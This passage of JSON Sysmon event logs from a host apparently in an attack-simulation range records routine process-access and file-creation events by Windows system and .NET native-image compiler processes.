C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:47.215","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04A9-5F25-0000-001045051000}","TargetProcessId":"4276","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7646,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:47.293\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04D3-5F25-0000-0010452F1100}\r\nTargetProcessId: 4132\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:47.293","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04D3-5F25-0000-0010452F1100}","TargetProcessId":"4132","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7647,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:47.293\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04D3-5F25-0000-0010452F1100}\r\nTargetProcessId: 4132\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:47.293","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D3-5F25-0000-0010452F1100}","TargetProcessId":"4132","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7648,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:47.293\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04D3-5F25-0000-0010452F1100}\r\nTargetProcessId: 4132\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:47.293","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04D3-5F25-0000-0010452F1100}","TargetProcessId":"4132","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7649,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:48.809\r\nProcessGuid: {A837DB8D-04D3-5F25-0000-0010452F1100}\r\nProcessId: 4132\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1024-0\\System.ServiceModel.Activities.dll\r\nCreationUtcTime: 2020-08-01 05:59:48.809","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:48.809","ProcessGuid":"{A837DB8D-04D3-5F25-0000-0010452F1100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1024-0\\System.ServiceModel.Activities.dll","CreationUtcTime":"2020-08-01 05:59:48.809","EventReceivedTime":"2020-08-01 05:59:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7650,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:48.871\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04D4-5F25-0000-00105B371100}\r\nTargetProcessId: 752\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:48.871","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04D4-5F25-0000-00105B371100}","TargetProcessId":"752","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7651,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:48.871\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04D4-5F25-0000-00105B371100}\r\nTargetProcessId: 752\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:48.871","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D4-5F25-0000-00105B371100}","TargetProcessId":"752","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7652,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:48.887\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04D4-5F25-0000-00105B371100}\r\nTargetProcessId: 752\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:48.887","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04D4-5F25-0000-00105B371100}","TargetProcessId":"752","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7653,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:48.950\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04D4-5F25-0000-0010543B1100}\r\nTargetProcessId: 3892\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:48.950","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04D4-5F25-0000-0010543B1100}","TargetProcessId":"3892","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
